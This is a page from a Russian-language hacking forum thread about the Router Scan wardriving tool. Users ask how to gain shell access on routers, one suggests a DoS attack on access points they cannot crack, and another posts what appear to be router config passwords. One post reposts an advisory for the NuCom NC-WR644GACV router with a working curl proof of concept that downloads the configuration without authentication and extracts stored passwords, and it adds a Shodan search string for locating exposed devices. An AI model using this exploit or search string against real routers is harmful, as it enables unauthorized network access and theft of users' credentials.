прога Router Scan

Discussion in 'Беспроводные технологии/Wi-Fi/Wardriving' started by СЕРЖ32, 11 Nov 2013.

Page 309 of 402
  1. mxhelmy

    mxhelmy New Member

    Joined:
    11 May 2018
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    Do you have any idea how to enter shell mode on Huawei HG630 V2,after decrypting the defaultcfg.xml there is no passoword for shell, I can have connection with the telnet,ssh now but the shell commands is limited on save,reboot,restore , I tried to write shell,welcome to shell, sh but there not working all non supported commands returns "command failed"
     
    #6161 mxhelmy, 27 Jun 2018
  2. keshavredina

    keshavredina Member

    Joined:
    30 Mar 2016
    Messages:
    41
    Likes Received:
    10
    Reputations:
    0
    Знайте: с вами так долго не прокатит, лучше бросайте это нехорошее дело, иначе можете сильно попасть, и тогда будете жалеть.
     
    #6162 keshavredina, 27 Jun 2018
  3. khamyk

    khamyk Well-Known Member

    Joined:
    30 Dec 2013
    Messages:
    552
    Likes Received:
    337
    Reputations:
    0
    Слышь правильный, онлайн церковь на другом сайте!
     
    #6163 khamyk, 27 Jun 2018
    010001110101011, sha9, oleedd and 3 others like this.
  4. Hose12

    Hose12 Member

    Joined:
    13 Aug 2015
    Messages:
    107
    Likes Received:
    68
    Reputations:
    0
    По-моему он свой пароль в базу сканом загрузил, теперь рвёт волосы во всех местах.
     
    #6164 Hose12, 27 Jun 2018
    010001110101011, robert, sha9 and 6 others like this.
  5. Tudiblad

    Tudiblad Member

    Joined:
    3 Oct 2017
    Messages:
    58
    Likes Received:
    19
    Reputations:
    0
    Очень напоминает сценарий фильма по бизнесмена Фому. :)
     
    #6165 Tudiblad, 27 Jun 2018
    sha9 likes this.
  6. Veil

    Veil Banned

    Joined:
    21 May 2015
    Messages:
    2,025
    Likes Received:
    3,355
    Reputations:
    72
    Ну если взломать не удается, то можно положить точку дос атакой.
    Кто это запретил воровать? Ты спроси об этом у депутатов, они тебе скажут.
    Когда от большого берется немножко, это не воровство, а просто дележка.
    Иди матчасть учи, а то сам попадешь и будешь жалеть.
    Ну и в третьих. Кого только не рожают.
     
    #6166 Veil, 27 Jun 2018
    Majgap, chugunkin, sha9 and 4 others like this.
  7. mxhelmy

    mxhelmy New Member

    Joined:
    11 May 2018
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    Are you guys fighting over me or what?
     
    #6167 mxhelmy, 27 Jun 2018
  8. qwerty_332

    qwerty_332 Banned

    Joined:
    21 Mar 2017
    Messages:
    31
    Likes Received:
    13
    Reputations:
    0
    #6168 qwerty_332, 27 Jun 2018
  9. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,717
    Likes Received:
    10,195
    Reputations:
    126
    В первой мало смысла, для неё нужно быть залогиненным (почитайте внимательно код). Хотя может быть можно её приспособить для вытаскивания пароля админа при заходе юзером, но не думаю, что это будет так просто...

    Вторая вообще для UPnP, а не для веб морды роутера.
    Определение поправил, там всё было предельно просто. :) Но на всех трёх IP уязвимость закрыта.
     
    #6169 binarymaster, 27 Jun 2018
    sha9, Triton_Mgn, Kakoluk and 3 others like this.
  10. 4ikotillo

    4ikotillo Elder - Старейшина

    Joined:
    29 Jun 2008
    Messages:
    444
    Likes Received:
    78
    Reputations:
    51
    А где брать поправленые версии? Они обновляются на сайте http://stascorp.com/load/1-1-0-56? И как правильно их обновлять?
     
    #6170 4ikotillo, 28 Jun 2018
  11. erwerr2321

    erwerr2321 Elder - Старейшина

    Joined:
    19 Jun 2015
    Messages:
    4,236
    Likes Received:
    26,250
    Reputations:
    148
    @4ikotillo

    Если не ошибаюсь, то самые новые всегда тут!
     
    #6171 erwerr2321, 28 Jun 2018
    sha9, Toroid, hunt.lsk and 5 others like this.
  12. 4ikotillo

    4ikotillo Elder - Старейшина

    Joined:
    29 Jun 2008
    Messages:
    444
    Likes Received:
    78
    Reputations:
    51
    Отлично! Спасибо, большое! =)
     
    #6172 4ikotillo, 28 Jun 2018
  13. sha9

    sha9 Well-Known Member

    Joined:
    25 Sep 2015
    Messages:
    568
    Likes Received:
    735
    Reputations:
    2
    простите за нескромный вопрос, а зачем вам лично понадобились инструменты для вардрайвинга,бэкдоры под туполинк и прошивки опеврт если вы такой законопослушный гражданин? коли охота сойти за правоборца, хотя бы удалите свои сообщения на форуме (по крайней мере некоторые из них):)


    п.с. не учите меня жить,лучше помогите материально (о.бендер) :p:D:D
     
    #6173 sha9, 4 Jul 2018
    Last edited: 4 Jul 2018
    Majgap, Gashek, Veil and 1 other person like this.
  14. sha9

    sha9 Well-Known Member

    Joined:
    25 Sep 2015
    Messages:
    568
    Likes Received:
    735
    Reputations:
    2
    эксплойт роутера NuCom NC-WR644GACV
    Overview
    ========
    Researchers of NVEL4 Cybersecurity company have discovered that it is
    possible to access to the config file bypassing admin authentication and
    authorization. The vulnerability has been reported to the vendor. The
    vendor has confirmed the vulnerability but not issued to security advisory.

    The recommendation to affected users is to update to the latest available
    version and change the credentials used, since they could have been
    extracted.

    Some NuCom routers are exposed to internet.
    Product Details
    =============
    * Type: Router / Access Point (Wireless Dual Band Gigabit VoIP Router)
    * Vendor: NuCom
    * Model Name: NC-WR644GACV
    * Vulnerable Software Version: <= STA 005
    * Fixed Software Version: STA 006

    Vulnerability Details
    ===================
    * CVE: 2018-8755
    * Name: Unauthenticated Configuration File Download
    * Type: Authentication / Authorization Bypass
    * Description: An unauthorizated user can download config file by
    accessing to the URL directly
    * Payload: http://[hostname]/cgi-bin/config_download.cgi?action=download
    * Impact: By downloading the config file an attacker can read all
    password stored in plain-text and base64 then access vie web as
    administrator and gain privileged control of the device.

    PoC
    ====

    zerial@home:~$ curl -s "http://vulnerable.hostname/
    cgi-bin/config_download.cgi?action=download"|strings|grep -i password
    InternetGatewayDevice.X_CT-COM_UserInfo.UserList.1.Password_realtext=[PLAIN
    PASSWORD HERE]
    InternetGatewayDevice.WANDevice.2.WANConnectionDevice.1.
    WANPPPConnection.1.Password=[BASE64 PASSWORD HERE]
    InternetGatewayDevice.X_CT-COM_UserInfo.UserList.2.Password_realtext=[PLAIN
    TEXT PASSWORD HERE]
    InternetGatewayDevice.LANDevice.1.WLANConfiguration.5.WPS.PeerPassword=[PLAIN
    TEXT PASSWORD HERE]
    InternetGatewayDevice.X_CT-COM_UserInfo.UserList.1.Password=[SHA256
    PASSWORD HERE]
    InternetGatewayDevice.X_CT-COM_UserInfo.UserList.2.Password=[SHA256
    PASSWORD HERE]
    InternetGatewayDevice.LANDevice.1.WLANConfiguration.1.WPS.PeerPassword=[PLAIN
    TEXT PASSWORD HERE]
    InternetGatewayDevice.ManagementServer.Password=[BASE64 PASSWORD HERE]
    InternetGatewayDevice.ManagementServer.ConnectionRequestPassword=[BASE64
    PASSWORD HERE]
    zerial@home:~

    шодан дорк
    NC-WR644GACV
     
    #6174 sha9, 4 Jul 2018
    Kakoluk, Mednik, hydra and 5 others like this.
  15. Kakoluk

    Kakoluk Banned

    Joined:
    14 Aug 2015
    Messages:
    514
    Likes Received:
    704
    Reputations:
    4
    to binarymaster.
    А можно ли добавить в секции настроек файлов авторизации, дурацкую кнопку "Перезагрузить словари"?
    Дело в том, что не редко приходится редактировать/менять словари "на ходу", не останавливая сканирования, и приходится выбирать файлы пар(проводник) и применять. Не особо удобно, если словари прежние, но только что отредактированы.
    Понимаю, мелко. Но если не трудно, сделайте плиз. :)
     
    #6175 Kakoluk, 6 Jul 2018
    sha9 and startless like this.
  16. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,717
    Likes Received:
    10,195
    Reputations:
    126
    В последней ночной сборке словари перезагружаются при открытии окна настроек по нажатию OK.
     
    #6176 binarymaster, 6 Jul 2018
    sha9, startless, CRACK211 and 9 others like this.
  17. Felis-Sapiens

    Felis-Sapiens Reservists Of Antichat

    Joined:
    21 Jul 2015
    Messages:
    616
    Likes Received:
    3,833
    Reputations:
    171
    hw_ctree.xml - 074318473
    hw_ctree(1).xml - 37111111
     
    #6177 Felis-Sapiens, 6 Jul 2018
    4Fun, sha9, CRACK211 and 7 others like this.
  18. muroslavvv

    muroslavvv New Member

    Joined:
    21 Jun 2018
    Messages:
    15
    Likes Received:
    0
    Reputations:
    0
    Нажать скачать или скачать пре-релиз ? В шапке*
     
    #6178 muroslavvv, 8 Jul 2018
  19. robert

    robert Member

    Joined:
    9 Mar 2018
    Messages:
    9
    Likes Received:
    10
    Reputations:
    0
    Хмм.... ТП везде ТП. Где здесь кнопка "Без баб"/"Избавить от женских сообщений"?
     
    #6179 robert, 9 Jul 2018
    sha9 likes this.
  20. sha9

    sha9 Well-Known Member

    Joined:
    25 Sep 2015
    Messages:
    568
    Likes Received:
    735
    Reputations:
    2
    комичность ситуации не в этом
    но согласно писанию, лицемерие еще больший грех. ;):D:D:D
     
    #6180 sha9, 9 Jul 2018
    DSL2650NRU and Gashek like this.
(You must log in or sign up to post here.)
Page 309 of 402
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.